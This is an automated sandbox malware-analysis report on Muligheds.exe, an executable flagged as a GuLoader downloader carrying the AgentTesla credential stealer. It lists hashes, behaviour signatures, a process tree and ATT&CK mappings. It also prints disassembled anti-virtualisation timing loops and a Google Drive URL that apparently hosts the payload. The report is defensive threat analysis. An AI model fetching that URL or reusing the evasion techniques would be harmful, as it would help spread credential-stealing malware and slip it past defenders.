Loading ...

Play interactive tourEdit tour

Analysis Report Muligheds.exe

Overview

General Information

Sample Name:Muligheds.exe
Analysis ID:356091
MD5:4aa8881d2d0103703bd7301616cd8caf
SHA1:e21e7048c04cad52b8f1ddfaa60135d0399ae202
SHA256:24e85ac996d35004ddc5768581a4c025c8620a5f42896d33c02f00c64d921e2f
Tags:exeGuLoader

Most interesting Screenshot:

Detection

AgentTesla GuLoader
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected AgentTesla
Yara detected GuLoader
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Hides threads from debuggers
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Startup

  • System is w10x64
  • Muligheds.exe (PID: 5896 cmdline: 'C:\Users\user\Desktop\Muligheds.exe' MD5: 4AA8881D2D0103703BD7301616CD8CAF)
    • RegAsm.exe (PID: 3868 cmdline: 'C:\Users\user\Desktop\Muligheds.exe' MD5: 6FD7592411112729BF6B1F2F6C34899F)
      • conhost.exe (PID: 3892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.469137619.0000000001211000.00000040.00000001.sdmpJoeSecurity_GuLoaderYara detected GuLoaderJoe Security
    00000008.00000002.474329596.000000001DEE1000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000008.00000002.474329596.000000001DEE1000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: RegAsm.exe PID: 3868JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          Process Memory Space: RegAsm.exe PID: 3868JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 1 entries

            Sigma Overview

            No Sigma rule has matched

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            Compliance:

            barindex
            Uses 32bit PE filesShow sources
            Source: Muligheds.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Uses secure TLS version for HTTPS connectionsShow sources
            Source: unknownHTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.3:49711 version: TLS 1.2
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS traffic detected: queries for: doc-0c-58-docs.googleusercontent.com
            Source: RegAsm.exe, 00000008.00000002.474329596.000000001DEE1000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
            Source: RegAsm.exe, 00000008.00000002.474329596.000000001DEE1000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
            Source: RegAsm.exe, 00000008.00000002.474329596.000000001DEE1000.00000004.00000001.sdmpString found in binary or memory: http://THoUbE.com
            Source: RegAsm.exeString found in binary or memory: https://drive.google.com/uc?export=download&id=1BCajiRx7Eb3aEQfR45eBviRxNQMQ93hS
            Source: RegAsm.exe, 00000008.00000002.474329596.000000001DEE1000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
            Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
            Source: unknownHTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.3:49711 version: TLS 1.2
            Source: Muligheds.exe, 00000000.00000002.327283395.000000000074A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
            Source: C:\Users\user\Desktop\Muligheds.exeProcess Stats: CPU usage > 98%
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_01215774 NtQueryInformationProcess,8_2_01215774
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_012153A6 NtProtectVirtualMemory,8_2_012153A6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0121578C NtQueryInformationProcess,8_2_0121578C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_012157D0 NtQueryInformationProcess,8_2_012157D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0121582C NtQueryInformationProcess,8_2_0121582C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_01215882 NtQueryInformationProcess,8_2_01215882
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_012158D6 NtQueryInformationProcess,8_2_012158D6
            Source: C:\Users\user\Desktop\Muligheds.exeCode function: 0_2_004018590_2_00401859
            Source: C:\Users\user\Desktop\Muligheds.exeCode function: 0_2_0040180C0_2_0040180C
            Source: C:\Users\user\Desktop\Muligheds.exeCode function: 0_2_0040161D0_2_0040161D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_1FFE47A08_2_1FFE47A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_1FFE47908_2_1FFE4790
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_201A90D88_2_201A90D8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_201A71208_2_201A7120
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_201A65088_2_201A6508
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_201A68508_2_201A6850
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
            Source: Muligheds.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: classification engineClassification label: mal84.troj.evad.winEXE@4/0@1/1
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3892:120:WilError_01
            Source: C:\Users\user\Desktop\Muligheds.exeFile created: C:\Users\user\AppData\Local\Temp\~DFF74510EC8D1D8160.TMPJump to behavior
            Source: Muligheds.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Muligheds.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Users\user\Desktop\Muligheds.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Muligheds.exe 'C:\Users\user\Desktop\Muligheds.exe'
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\Muligheds.exe'
            Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Muligheds.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\Muligheds.exe' Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected

            Data Obfuscation:

            barindex
            Yara detected GuLoaderShow sources
            Source: Yara matchFile source: 00000008.00000002.469137619.0000000001211000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3868, type: MEMORY
            Source: C:\Users\user\Desktop\Muligheds.exeCode function: 0_2_00407D1C push esp; retf 0_2_00407D1F
            Source: C:\Users\user\Desktop\Muligheds.exeCode function: 0_2_00407264 push es; retf 0_2_004072FA
            Source: C:\Users\user\Desktop\Muligheds.exeCode function: 0_2_004072E3 push es; retf 0_2_004072FA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_012156CF push esp; ret 8_2_012156D6
            Source: C:\Users\user\Desktop\Muligheds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion:

            barindex
            Detected RDTSC dummy instruction sequence (likely for instruction hammering)Show sources
            Source: C:\Users\user\Desktop\Muligheds.exeRDTSC instruction interceptor: First address: 0000000000722671 second address: 0000000000722671 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007F9B4CB6B488h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d pop ecx 0x0000001e add edi, edx 0x00000020 dec ecx 0x00000021 cmp ecx, 00000000h 0x00000024 jne 00007F9B4CB6B471h 0x00000026 push ecx 0x00000027 cmp ch, dh 0x00000029 call 00007F9B4CB6B4A2h 0x0000002e call 00007F9B4CB6B498h 0x00000033 lfence 0x00000036 mov edx, dword ptr [7FFE0014h] 0x0000003c lfence 0x0000003f ret 0x00000040 mov esi, edx 0x00000042 pushad 0x00000043 rdtsc
            Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Tries to detect Any.runShow sources
            Source: C:\Users\user\Desktop\Muligheds.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
            Source: C:\Users\user\Desktop\Muligheds.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: RegAsm.exeBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Tries to detect virtualization through RDTSC time measurementsShow sources
            Source: C:\Users\user\Desktop\Muligheds.exeRDTSC instruction interceptor: First address: 0000000000722671 second address: 0000000000722671 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007F9B4CB6B488h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d pop ecx 0x0000001e add edi, edx 0x00000020 dec ecx 0x00000021 cmp ecx, 00000000h 0x00000024 jne 00007F9B4CB6B471h 0x00000026 push ecx 0x00000027 cmp ch, dh 0x00000029 call 00007F9B4CB6B4A2h 0x0000002e call 00007F9B4CB6B498h 0x00000033 lfence 0x00000036 mov edx, dword ptr [7FFE0014h] 0x0000003c lfence 0x0000003f ret 0x00000040 mov esi, edx 0x00000042 pushad 0x00000043 rdtsc
            Source: C:\Users\user\Desktop\Muligheds.exeRDTSC instruction interceptor: First address: 0000000000722810 second address: 0000000000722810 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007F9B4CBB1AFFh 0x0000001d popad 0x0000001e cmp ebx, D5708B63h 0x00000024 call 00007F9B4CBAF71Dh 0x00000029 lfence 0x0000002c rdtsc
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRDTSC instruction interceptor: First address: 0000000001212810 second address: 0000000001212810 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007F9B4CB6D86Fh 0x0000001d popad 0x0000001e cmp ebx, D5708B63h 0x00000024 call 00007F9B4CB6B48Dh 0x00000029 lfence 0x0000002c rdtsc
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_01212D41 rdtsc 8_2_01212D41
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 371Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 9440Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320Thread sleep time: -8301034833169293s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: RegAsm.exeBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformationJump to behavior

            Anti Debugging:

            barindex
            Hides threads from debuggersShow sources
            Source: C:\Users\user\Desktop\Muligheds.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Users\user\Desktop\Muligheds.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_01212D41 rdtsc 8_2_01212D41
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0121333E LdrInitializeThunk,8_2_0121333E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_01212512 mov eax, dword ptr fs:[00000030h]8_2_01212512
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_01214916 mov eax, dword ptr fs:[00000030h]8_2_01214916
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_01214F70 mov eax, dword ptr fs:[00000030h]8_2_01214F70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_01214F72 mov eax, dword ptr fs:[00000030h]8_2_01214F72
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_012140B9 mov eax, dword ptr fs:[00000030h]8_2_012140B9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\Muligheds.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\Muligheds.exe' Jump to behavior
            Source: RegAsm.exe, 00000008.00000002.469678278.0000000001990000.00000002.00000001.sdmpBinary or memory string: Program Manager
            Source: RegAsm.exe, 00000008.00000002.469678278.0000000001990000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
            Source: RegAsm.exe, 00000008.00000002.469678278.0000000001990000.00000002.00000001.sdmpBinary or memory string: Progman
            Source: RegAsm.exe, 00000008.00000002.469678278.0000000001990000.00000002.00000001.sdmpBinary or memory string: Progmanlock
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information:

            barindex
            Yara detected AgentTeslaShow sources
            Source: Yara matchFile source: 00000008.00000002.474329596.000000001DEE1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3868, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.474329596.000000001DEE1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3868, type: MEMORY

            Remote Access Functionality:

            barindex
            Yara detected AgentTeslaShow sources
            Source: Yara matchFile source: 00000008.00000002.474329596.000000001DEE1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3868, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation211DLL Side-Loading1Process Injection12Virtualization/Sandbox Evasion34Input Capture1Security Software Discovery631Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsDLL Side-Loading1Disable or Modify Tools1LSASS MemoryVirtualization/Sandbox Evasion34Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection12Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDLL Side-Loading1LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
